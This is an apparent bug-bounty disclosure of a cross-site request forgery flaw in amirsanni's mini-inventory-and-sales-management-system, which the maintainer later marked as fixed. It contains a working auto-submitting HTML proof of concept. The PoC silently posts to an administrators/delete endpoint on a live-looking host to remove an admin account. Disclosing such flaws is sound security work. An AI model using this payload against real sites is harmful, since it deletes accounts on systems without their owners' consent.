Cross-Site Request Forgery (CSRF) in amirsanni/mini-inventory-and-sales-management-system

Valid

Reported on

Sep 7th 2021

✍️ Description

Attacker is able to delete a administrator accounts if a logged in user visits attacker website.

🕵️‍♂️ Proof of Concept

1.when you logged in open this POC.html in a browser(Firefox and Safari)
2.you can check unintentionally you delete an administrator account.


//POC.html
<html>
 <body>
 <script>history.pushState('', '', '/')</script>
   <form action="https://1410inc.xyz/mini-inventory-and-sales-management-system/administrators/delete" method="POST">
     <input type="hidden" name="_aId" value="396" />
     <input type="submit" value="Submit request" />
   </form>
   <script>
     document.forms[0].submit();
   </script>
 </body>
</html>

💥 Impact

This vulnerability is capable of forging admin to unintentional delete an account.

💥 Test

Tested on Firefox and safari.

💥 Fix

You should set a CSRF token on this requests.

References

csrf

We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back 2 years ago

Musio

commented 2 years ago

Researcher

hi are you checked this report?

Amir validated this vulnerability a year ago

Musio has been awarded the disclosure bounty

The fix bounty is now up for grabs

Amir marked this as fixed with commit ba36f6 a year ago

Amir has been awarded the fix bounty

This vulnerability will not receive a CVE

to join this conversation